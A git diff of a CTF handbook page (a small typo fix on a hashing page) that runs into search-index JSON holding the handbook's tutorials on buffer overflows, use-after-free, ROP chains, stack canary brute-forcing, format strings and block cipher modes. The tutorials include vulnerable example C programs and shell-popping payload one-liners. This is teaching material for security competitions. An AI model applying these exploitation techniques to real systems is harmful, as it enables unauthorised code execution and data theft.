diff --git a/cryptography/what-are-hashing-functions/index.html b/cryptography/what-are-hashing-functions/index.html index a32d3b10..c9843b52 100644 --- a/cryptography/what-are-hashing-functions/index.html +++ b/cryptography/what-are-hashing-functions/index.html @@ -3259,7 +3259,7 @@
A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn’t). For example, the hash for “dog” should be different from other hashes.
-You can use command line tools tools or online resources such as this one. +
You can use command line tools or online resources such as this one.
Example:
$ echo -n password | md5 5f4dcc3b5aa765d61d8327deb882cf99
Here, “password” is hashed with different hashing algorithms:
Capture the Flags, or CTFs, are computer security competitions.
Teams of competitors (or just individuals) are pitted against each other in various challenges across multiple security disciplines, competing to earn the most points.
CTFs are often the beginning of one's cyber security career due to their team building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.
Info
For information about ongoing CTFs, check out CTFTime.
In this handbook you'll learn the basics\u2122 behind the methodologies and techniques needed to succeed in Capture the Flag competitions.
"}, {"location": "binary-exploitation/address-space-layout-randomization/", "title": "Address Space Layout Randomization (ASLR)", "text": "Address Space Layout Randomization (or ASLR) is the randomization of the place in memory where the program, shared libraries, the stack, and the heap are. This makes can make it harder for an attacker to exploit a service, as knowledge about where the stack, heap, or libc can't be re-used between program launches. This is a partially effective way of preventing an attacker from jumping to, for example, libc without a leak.
Typically, only the stack, heap, and shared libraries are ASLR enabled. It is still somewhat rare for the main program to have ASLR enabled, though it is being seen more frequently and is slowly becoming the default.
"}, {"location": "binary-exploitation/buffer-overflow/", "title": "Buffer Overflow", "text": "A Buffer Overflow is a vulnerability in which data can be written which exceeds the allocated space, allowing an attacker to overwrite other data.
"}, {"location": "binary-exploitation/buffer-overflow/#stack-buffer-overflow", "title": "Stack buffer overflow", "text": "The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.
#include <stdio.h>\n\nint main() {\n int secret = 0xdeadbeef;\n char name[100] = {0};\n read(0, name, 0x100);\n if (secret == 0x1337) {\n puts(\"Wow! Here's a secret.\");\n } else {\n puts(\"I guess you're not cool enough to see my secret\");\n }\n}\n
There's a tiny mistake in this program which will allow us to see the secret. name
is decimal 100 bytes, however we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.
If the compiler chose to layout the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x0\nESP -> 0xffff0000: 0x0 // name\n
let's look at what happens when we read in 0x100 bytes of 'A's.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
However when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbe41 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The least significant byte of secret
has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of secret
is \"clobbered\" with our 'A's
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0x41414141 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The remaining 152 bytes would continue clobbering values up the stack.
"}, {"location": "binary-exploitation/buffer-overflow/#passing-an-impossible-check", "title": "Passing an impossible check", "text": "How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite secret
happen to be the bytes that represent 0x1337 in little-endian, we'll see the secret message.
A small Python one-liner will work nicely: python -c \"print 'A'*100 + '\\x31\\x13\\x00\\x00'\"
This will fill the name
buffer with 100 'A's, then overwrite secret
with the 32-bit little-endian encoding of 0x1337.
As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as \"Saved EIP\" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main
finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called \"popping a shell\") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this defined somewhere else in the program that we normally can't get to:
void give_shell() {\n system(\"/bin/sh\");\n}\n
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell
is. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell
, and giving us our shell.
Assuming give_shell
is at 0x08048fd0, we could use something like this: python -c \"print 'A'*108 + '\\xd0\\x8f\\x04\\x08'\"
We send 108 'A's to overwrite the 100 bytes that is allocated for name
, the 4 bytes for secret
, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell
's address, and we would get a shell!
This idea is extended on in Return Oriented Programming
"}, {"location": "binary-exploitation/heap-exploitation/", "title": "Heap Exploits", "text": ""}, {"location": "binary-exploitation/heap-exploitation/#overflow", "title": "Overflow", "text": "Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide new attack surface.
"}, {"location": "binary-exploitation/heap-exploitation/#use-after-free-uaf", "title": "Use After Free (UAF)", "text": "Once free
is called on an allocation, the allocator is free to re-allocate that chunk of memory in future calls to malloc
if it so chooses. However if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called a use after free or UAF.
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n\ntypedef struct string {\n unsigned length;\n char *data;\n} string;\n\nint main() {\n struct string* s = malloc(sizeof(string));\n puts(\"Length:\");\n scanf(\"%u\", &s->length);\n s->data = malloc(s->length + 1);\n memset(s->data, 0, s->length + 1);\n puts(\"Data:\");\n read(0, s->data, s->length);\n\n free(s->data);\n free(s);\n\n char *s2 = malloc(16);\n memset(s2, 0, 16);\n puts(\"More data:\");\n read(0, s2, 15);\n\n // Now using s again, a UAF\n\n puts(s->data);\n\n return 0;\n}\n
In this example, we have a string
structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string
. Due to how glibc's allocator works, s2
will actually get the same memory as the original s
allocation, which in turn gives us the ability to control the s->data
pointer. This could be used to leak program data.
Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc
, free
, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:
The No eXecute or the NX bit (also known as Data Execution Prevention or DEP) marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.
"}, {"location": "binary-exploitation/overview/", "title": "Overview", "text": ""}, {"location": "binary-exploitation/overview/#binary-exploitation", "title": "Binary Exploitation", "text": "Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions.
Common topics addressed by Binary Exploitation or 'pwn' challenges include:
Relocation Read-Only (or RELRO) is a security measure which makes some binary sections read-only.
There are two RELRO \"modes\": partial and full.
"}, {"location": "binary-exploitation/relocation-read-only/#partial-relro", "title": "Partial RELRO", "text": "Partial RELRO is the default setting in GCC, and nearly all binaries you will see have at least partial RELRO.
From an attackers point-of-view, partial RELRO makes almost no difference, other than it forces the GOT to come before the BSS in memory, eliminating the risk of a buffer overflows on a global variable overwriting GOT entries.
"}, {"location": "binary-exploitation/relocation-read-only/#full-relro", "title": "Full RELRO", "text": "Full RELRO makes the entire GOT read-only which removes the ability to perform a \"GOT overwrite\" attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.
Full RELRO is not a default compiler setting as it can greatly increase program startup time since all symbols must be resolved before the program is started. In large programs with thousands of symbols that need to be linked, this could cause a noticable delay in startup time.
"}, {"location": "binary-exploitation/return-oriented-programming/", "title": "Return Oriented Programming", "text": "Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell
function however, so we need to find a way to manually invoke system
or another exec
function to get us our shell.
Imagine we have a program similar to the following:
#include <stdio.h>\n#include <stdlib.h>\n\nchar name[32];\n\nint main() {\n printf(\"What's your name? \");\n read(0, name, 32);\n\n printf(\"Hi %s\\n\", name);\n\n printf(\"The time is currently \");\n system(\"/bin/date\");\n\n char echo[100];\n printf(\"What do you want me to echo back? \");\n read(0, echo, 1000);\n puts(echo);\n\n return 0;\n}\n
We obviously have a stack buffer overflow on the echo
variable which can give us EIP control when main
returns. But we don't have a give_shell
function! So what can we do?
We can call system
with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.
When main returns, we want our stack to look like something had normally called system
. Recall what is on the stack after a function has been called:
... // More arguments\n 0xffff0008: 0x00000002 // Argument 2\n 0xffff0004: 0x00000001 // Argument 1\nESP -> 0xffff0000: 0x080484d0 // Return address\n
So main
's stack frame needs to look like this:
0xffff0008: 0xdeadbeef // system argument 1\n 0xffff0004: 0xdeadbeef // return address for system\nESP -> 0xffff0000: 0x08048450 // return address for main (system's PLT entry)\n
Then when main
returns, it will jump into system
's PLT entry and the stack will appear just like system
had been called normally for the first time.
Note: we don't care about the return address system
will return to because we will have already gotten our shell by then!
This is a good start, but we need to pass an argument to system
for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries \"move around\" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case however, we have a very convenient name
global which will be at a known location in the binary (in the BSS segment).
Our exploit will need to do the following:
name
system
's PLT entryname
global to act as the first argument to system
In 64-bit binaries we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running system
, this means we will need to find a way to control the RDI register.
To do this, we'll use small snippets of assembly in the binary, called \"gadgets.\" These gadgets usually pop
one or more registers off of the stack, and then call ret
, which allows us to chain them together by making a large fake call stack.
For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):
0x400c01: pop rdi; ret\n0x400c03: pop rsi; pop r15; ret\n
We can setup a fake call stack with these gadets to sequentially execute them, pop
ing values we control into registers, and then end with a jump to system
.
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n 0xffff0008: 0xdeadbeef // value to be popped into rdi\nRSP -> 0xffff0000: 0x400c01 // address of rdi gadget\n
Stepping through this one instruction at a time, main
returns, jumping to our pop rdi
gadget:
RIP = 0x400c01 (pop rdi)\nRDI = UNKNOWN\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\nRSP -> 0xffff0008: 0xdeadbeef // value to be popped into rdi\n
pop rdi
is then executed, popping the top of the stack into RDI:
RIP = 0x400c02 (ret)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\nRSP -> 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n
The RDI gadget then ret
s into our RSI gadget:
RIP = 0x400c03 (pop rsi)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\nRSP -> 0xffff0018: 0x1337beef // value we want in rsi\n
RSI and R15 are popped:
RIP = 0x400c05 (ret)\nRDI = 0xdeadbeef\nRSI = 0x1337beef\n\nRSP -> 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n
And finally, the RSI gadget ret
s, jumping to whatever function we want, but now with RDI and RSI set to values we control.
Stack Canaries are a secret value placed on the stack which changes every time the program is started. Prior to a function return, the stack canary is checked and if it appears to be modified, the program exits immeadiately.
"}, {"location": "binary-exploitation/stack-canaries/#bypassing-stack-canaries", "title": "Bypassing Stack Canaries", "text": "Stack Canaries seem like a clear cut way to mitigate any stack smashing as it is fairly impossible to just guess a random 64-bit value. However, leaking the address and bruteforcing the canary are two methods which would allow us to get through the canary check.
"}, {"location": "binary-exploitation/stack-canaries/#stack-canary-leaking", "title": "Stack Canary Leaking", "text": "If we can read the data in the stack canary, we can send it back to the program later because the canary stays the same throughout execution. However Linux makes this slightly tricky by making the first byte of the stack canary a NULL, meaning that string functions will stop when they hit it. A method around this would be to partially overwrite and then put the NULL back or find a way to leak bytes at an arbitrary stack offset.
A few situations where you might be able to leak a canary:
The canary is determined when the program starts up for the first time which means that if the program forks, it keeps the same stack cookie in the child process. This means that if the input that can overwrite the canary is sent to the child, we can use whether it crashes as an oracle and brute-force 1 byte at a time!
This method can be used on fork-and-accept servers where connections are spun off to child processes, but only under certain conditions such as when the input accepted by the program does not append a NULL byte (read or recv).
Buffer (N Bytes) ?? ?? ?? ?? ?? ?? ?? ?? RBP RIPFill the buffer N Bytes + 0x00 results in no crash
Buffer (N Bytes) 00 ?? ?? ?? ?? ?? ?? ?? RBP RIPFill the buffer N Bytes + 0x00 + 0x00 results in a crash
N Bytes + 0x00 + 0x01 results in a crash
N Bytes + 0x00 + 0x02 results in a crash
...
N Bytes + 0x00 + 0x51 results in no crash
Buffer (N Bytes) 00 51 ?? ?? ?? ?? ?? ?? RBP RIPRepeat this bruteforcing process for 6 more bytes...
Buffer (N Bytes) 00 51 FE 0A 31 D2 7B 3C RBP RIPNow that we have the stack cookie, we can overwrite the RIP register and take control of the program!
"}, {"location": "binary-exploitation/what-are-buffers/", "title": "Buffers", "text": "A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name
would be considered a stack buffer:
#include <stdio.h>\n\nint main() {\n char name[64] = {0};\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Buffers could also be global variables:
#include <stdio.h>\n\nchar name[64] = {0};\n\nint main() {\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Or dynamically allocated on the heap:
#include <stdio.h>\n#include <stdlib.h>\n\nint main() {\n char *name = malloc(64);\n memset(name, 0, 64);\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
"}, {"location": "binary-exploitation/what-are-buffers/#exploits", "title": "Exploits", "text": "Given that buffers commonly hold user input, mistakes when writing to them could result in attacker controlled data being written outside of the buffer's space. See the page on buffer overflows for more.
"}, {"location": "binary-exploitation/what-are-calling-conventions/", "title": "Calling Conventions", "text": "To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked in to programs that need it, reducing program size.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit
"}, {"location": "binary-exploitation/what-are-calling-conventions/#cdecl", "title": "cdecl", "text": "In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {\n return a + b + c;\n}\n
would be invoked by pushing c
, then b
, then a
.
For 64-bit binaries, function arguments are first passed in certain registers:
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
"}, {"location": "binary-exploitation/what-are-calling-conventions/#other-conventions", "title": "Other Conventions", "text": "Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.
"}, {"location": "binary-exploitation/what-are-registers/", "title": "Registers", "text": "A register is a location within the processor that is able to store data, much like RAM. Unlike RAM however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not \"general purpose registers\" (GPRs). On x86, the only 2 reserved registers are rip
and rsp
which hold the address of the next instruction to execute and the address of the stack respectively.
On x86, the same register can have different sized accesses for backwards compatability. For example, the rax
register is the full 64-bit register, eax
is the low 32 bits of rax
, ax
is the low 16 bits, al
is the low 8 bits, and ah
is the high 8 bits of ax
(bits 8-16 of rax
).
A format string vulnerability is a bug where user input is passed as the format argument to printf
, scanf
, or another function in that family.
The format argument has many different specifiers which could allow an attacker to leak data if they control the format argument to printf
. Since printf
and similar are variadic functions, they will continue popping data off of the stack according to the format.
For example, if we can make the format argument \"%x.%x.%x.%x\", printf
will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf
can also index to an arbitrary \"argument\" with the following syntax: \"%n$x\" (where n
is the decimal index of the argument you want).
While these bugs are powerful, they're very rare nowadays, as all modern compilers warn when printf
is called with a non-constant string.
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int secret_num = 0x8badf00d;\n\n char name[64] = {0};\n read(0, name, 64);\n printf(\"Hello \");\n printf(name);\n printf(\"! You'll never get my secret!\\n\");\n return 0;\n}\n
Due to how GCC decided to lay out the stack, secret_num
is actually at a lower address on the stack than name
, so we only have to go to the 7th \"argument\" in printf
to leak the secret:
$ ./fmt_string\n%7$llx\nHello 8badf00d3ea43eef\n! You'll never get my secret!\n
"}, {"location": "binary-exploitation/what-is-binary-security/", "title": "Binary Security", "text": "Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. This tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.
Some methods covered include:
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are \"linked\" into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of function to address in dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts
won't be resolved to an address in libc until after it has been called once:
int main() {\n puts(\"Hi there!\");\n puts(\"Ok bye now.\");\n return 0;\n}\n
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls \"short circuit\" straight to their implementation bypassing the dynamic resolver.
This has two important implications:
These two facts will become very useful to use in Return Oriented Programming
"}, {"location": "binary-exploitation/what-is-the-got/#plt", "title": "PLT", "text": "Before a functions address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small \"stub\" function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
"}, {"location": "binary-exploitation/what-is-the-heap/", "title": "The Heap", "text": "The heap is a place in memory which a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:
There are also some disadvantages however:
In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:
malloc
: allocate n
bytes on the heapfree
: free the given allocationLet's see how these could be used in a program:
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nint main() {\n unsigned alloc_size = 0;\n char *stuff;\n\n printf(\"Number of bytes? \");\n scanf(\"%u\", &alloc_size);\n\n stuff = malloc(alloc_size + 1);\n memset(stuff, 0, alloc_size + 1);\n\n read(0, stuff, alloc_size);\n\n printf(\"You wrote: %s\", stuff);\n\n free(stuff);\n\n return 0;\n}\n
This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.
"}, {"location": "binary-exploitation/what-is-the-stack/", "title": "The Stack", "text": "In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp
/rsp
register holds the address in memory where the bottom of the stack resides. When something is push
ed to the stack, esp
decrements by 4 (or 8 on 64-bit x86), and the value that was push
ed is stored at that location in memory. Likewise, when a pop
instruction is executed, the value at esp
is retrieved (i.e. esp
is dereferenced), and esp
is then incremented by 4 (or 8).
N.B. The stack \"grows\" down to lower memory addresses!
Conventionally, ebp
/rbp
contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp
rather than an offset to esp
. A stack frame is essentially just the space used on the stack by a given function.
The stack is primarily used for a few things:
Let's see what the stack looks like right after say_hi
has been called in this 32-bit x86 C program:
#include <stdio.h>\n\nvoid say_hi(const char * name) {\n printf(\"Hello %s!\\n\", name);\n}\n\nint main(int argc, char ** argv) {\n char * name;\n if (argc != 2) {\n return 1;\n }\n name = argv[1];\n say_hi(name);\n return 0;\n}\n
And the relevant assembly:
0804840b <say_hi>:\n 804840b: 55 push ebp\n 804840c: 89 e5 mov ebp,esp\n 804840e: 83 ec 08 sub esp,0x8\n 8048411: 83 ec 08 sub esp,0x8\n 8048414: ff 75 08 push DWORD PTR [ebp+0x8]\n 8048417: 68 f0 84 04 08 push 0x80484f0\n 804841c: e8 bf fe ff ff call 80482e0 <printf@plt>\n 8048421: 83 c4 10 add esp,0x10\n 8048424: 90 nop\n 8048425: c9 leave\n 8048426: c3 ret\n\n08048427 <main>:\n 8048427: 8d 4c 24 04 lea ecx,[esp+0x4]\n 804842b: 83 e4 f0 and esp,0xfffffff0\n 804842e: ff 71 fc push DWORD PTR [ecx-0x4]\n 8048431: 55 push ebp\n 8048432: 89 e5 mov ebp,esp\n 8048434: 51 push ecx\n 8048435: 83 ec 14 sub esp,0x14\n 8048438: 89 c8 mov eax,ecx\n 804843a: 83 38 02 cmp DWORD PTR [eax],0x2\n 804843d: 74 07 je 8048446 <main+0x1f>\n 804843f: b8 01 00 00 00 mov eax,0x1\n 8048444: eb 1c jmp 8048462 <main+0x3b>\n 8048446: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 8048449: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 804844c: 89 45 f4 mov DWORD PTR [ebp-0xc],eax\n 804844f: 83 ec 0c sub esp,0xc\n 8048452: ff 75 f4 push DWORD PTR [ebp-0xc]\n 8048455: e8 b1 ff ff ff call 804840b <say_hi>\n 804845a: 83 c4 10 add esp,0x10\n 804845d: b8 00 00 00 00 mov eax,0x0\n 8048462: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]\n 8048465: c9 leave\n 8048466: 8d 61 fc lea esp,[ecx-0x4]\n 8048469: c3 ret\n
Skipping over the bulk of main
, you'll see that at 0x8048452
main
's name
local is pushed to the stack because it's the first argument to say_hi
. Then, a call
instruction is executed. call
instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi
at 0x0804840b
, the stack looks like this:
EIP = 0x0804840b (push ebp)\nESP = 0xffff0000\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
The first thing say_hi
does is save the current ebp
so that when it returns, ebp
is back where main
expects it to be. The stack now looks like this:
EIP = 0x0804840c (mov ebp, esp)\nESP = 0xfffefffc\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Again, note how esp
gets smaller when values are pushed to the stack.
Next, the current esp
is saved into ebp
, marking the top of the new stack frame.
EIP = 0x0804840e (sub esp, 0x8)\nESP = 0xfffefffc\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP, EBP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Then, the stack is \"grown\" to accommodate local variables inside say_hi
.
EIP = 0x08048414 (push [ebp + 0x8])\nESP = 0xfffeffec\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\nESP -> 0xfffefffc: UNDEFINED\n
NOTE: stack space is not implictly cleared!
Now, the 2 arguments to printf
are pushed in reverse order.
EIP = 0x0804841c (call printf@plt)\nESP = 0xfffeffe4\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\nESP -> 0xfffeffe4: 0x080484f0 // printf argument 1\n
Finally, printf
is called, which pushes the address of the next instruction to execute.
EIP = 0x080482e0\nESP = 0xfffeffe4\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\n 0xfffeffe4: 0x080484f0 // printf argument 1\nESP -> 0xfffeffe0: 0x08048421 // Return address for printf\n
Once printf
has returned, the leave
instruction moves ebp
into esp
, and pops the saved EBP.
EIP = 0x08048426 (ret)\nESP = 0xfffefffc\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
And finally, ret
pops the saved instruction pointer into eip
which causes the program to return to main with the same esp
, ebp
, and stack contents as when say_hi
was initially called.
EIP = 0x0804845a (add esp, 0x10)\nESP = 0xffff0000\nEBP = 0xffff002c\n\nESP -> 0xffff0004: 0xffffa0a0 // say_hi argument 1\n
"}, {"location": "cryptography/overview/", "title": "Overview", "text": ""}, {"location": "cryptography/overview/#cryptography", "title": "Cryptography", "text": "Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes which are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.
The word \u201ccryptography\u201d technically means the art of writing codes. When it comes to digital forensics, it\u2019s a method you can use to understand how data is constructed for your analysis.
"}, {"location": "cryptography/overview/#what-is-cryptography-used-for", "title": "What is cryptography used for?", "text": "Uses in every day software
Malicious uses
A Block Cipher is an algorithm which is used in conjunction with a cryptosystem in order to package a message into evenly distributed 'blocks' which are encrypted one at a time.
"}, {"location": "cryptography/what-are-block-ciphers/#definitions", "title": "Definitions", "text": "Note
In this case ~i~ represents an index over the # of blocks in the plaintext. F() and g() represent the function used to convert plaintext into ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#electronic-codebook-ecb", "title": "Electronic Codebook (ECB)", "text": "ECB is the most basic block cipher, it simply chunks up plaintext into blocks and independently encrypts those blocks and chains them all into a ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#flaws", "title": "Flaws", "text": "
Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the CBC Penguin image below.
Original Image ECB Image Other Block Cipher Modes"}, {"location": "cryptography/what-are-block-ciphers/#cipher-block-chaining-cbc", "title": "Cipher Block Chaining (CBC)", "text": "CBC is an improvement upon ECB where an Initialization Vector is used in order to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of
Note
Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#propogating-cipher-block-chaining-pcbc", "title": "Propogating Cipher Block Chaining (PCBC)", "text": "PCBC is a less used cipher which modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process \"propogate\" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.
"}, {"location": "cryptography/what-are-block-ciphers/#counter-ctr", "title": "Counter (CTR)", "text": "
Note
Counter is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)
CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the exact same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.
"}, {"location": "cryptography/what-are-block-ciphers/#security-considerations", "title": "Security Considerations", "text": "
If the nonce chosen is non-random, it is important to concatonate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter) as adding or XORing the nonce with the counter would break security as an attacker can cause a collisions with the nonce and counter. An attacker with access to providing a plaintext, nonce and counter can then decrypt a block by using the ciphertext as seen in the decryption image.
"}, {"location": "cryptography/what-are-block-ciphers/#padding-oracle-attack", "title": "Padding Oracle Attack", "text": "A Padding Oracle Attack sounds complex, but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.
